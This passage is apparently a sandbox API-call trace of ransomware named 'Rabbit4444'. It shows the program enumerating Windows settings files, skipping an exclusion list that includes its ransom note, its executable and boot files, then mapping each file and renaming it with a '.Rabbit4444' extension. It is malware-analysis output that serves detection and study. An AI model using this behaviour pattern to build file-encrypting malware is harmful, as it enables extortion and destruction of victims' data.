(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isplayaudiocuesenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isplayaudiocuesenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.055] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1db32796, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1db32796, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", cAlternateFileName="AA29E2~1.SET")) returned 1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.055] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.055] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms" [0057.055] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.056] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms") returned 78 [0057.056] lstrlenW (lpString="Rabbit4444") returned 10 [0057.056] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.056] lstrlenW (lpString=".dll") returned 4 [0057.056] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.056] lstrlenW (lpString=".lnk") returned 4 [0057.056] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.056] lstrlenW (lpString=".ini") returned 4 [0057.056] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.056] lstrlenW (lpString=".sys") returned 4 [0057.056] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.056] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isreadhintsenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.056] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.056] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14836689859) returned 1 [0057.056] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1355) returned 1 [0057.056] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.056] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.056] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0057.057] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0057.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.058] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.059] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14836940207) returned 1 [0057.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.059] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.059] CloseHandle (hObject=0x298) returned 1 [0057.059] CloseHandle (hObject=0x278) returned 1 [0057.059] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms.Rabbit4444") returned 206 [0057.059] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isreadhintsenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isreadhintsenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.060] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1df5e94c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1df5e94c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x528, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", cAlternateFileName="AA3E47~1.SET")) returned 1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2=".") returned 1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2="..") returned 1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2="windows") returned -1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2="boot") returned -1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.060] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.060] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms" [0057.060] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.060] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms") returned 71 [0057.060] lstrlenW (lpString="Rabbit4444") returned 10 [0057.060] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.060] lstrlenW (lpString=".dll") returned 4 [0057.060] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.061] lstrlenW (lpString=".lnk") returned 4 [0057.061] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.061] lstrlenW (lpString=".ini") returned 4 [0057.061] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.061] lstrlenW (lpString=".sys") returned 4 [0057.061] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_speechpitch.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.061] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.061] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14837172462) returned 1 [0057.061] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1320) returned 1 [0057.061] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.061] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0057.061] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0057.062] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0057.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.063] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14837418527) returned 1 [0057.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0057.064] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.064] CloseHandle (hObject=0x298) returned 1 [0057.064] CloseHandle (hObject=0x278) returned 1 [0057.064] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms.Rabbit4444") returned 199 [0057.064] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_speechpitch.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_speechpitch.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.065] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e2cbf50, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1e2cbf50, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x528, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", cAlternateFileName="AA114E~1.SET")) returned 1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2=".") returned 1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2="..") returned 1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2="windows") returned -1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2="boot") returned -1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.065] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.065] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms" [0057.065] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.065] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms") returned 71 [0057.065] lstrlenW (lpString="Rabbit4444") returned 10 [0057.065] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.065] lstrlenW (lpString=".dll") returned 4 [0057.066] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.066] lstrlenW (lpString=".lnk") returned 4 [0057.066] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.066] lstrlenW (lpString=".ini") returned 4 [0057.066] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.066] lstrlenW (lpString=".sys") returned 4 [0057.066] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.066] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_speechspeed.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.066] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.066] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14837702896) returned 1 [0057.066] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1320) returned 1 [0057.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0057.066] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0057.067] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0057.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.069] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14837938597) returned 1 [0057.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0057.069] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.069] CloseHandle (hObject=0x298) returned 1 [0057.069] CloseHandle (hObject=0x278) returned 1 [0057.069] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms.Rabbit4444") returned 199 [0057.069] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_speechspeed.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_speechspeed.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.070] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e63957f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1e63957f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", cAlternateFileName="AA692E~1.SET")) returned 1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2=".") returned 1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2="..") returned 1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2="windows") returned -1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2="boot") returned -1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.075] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.075] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms" [0057.075] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.076] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms") returned 72 [0057.076] lstrlenW (lpString="Rabbit4444") returned 10 [0057.076] lstrcmpiW 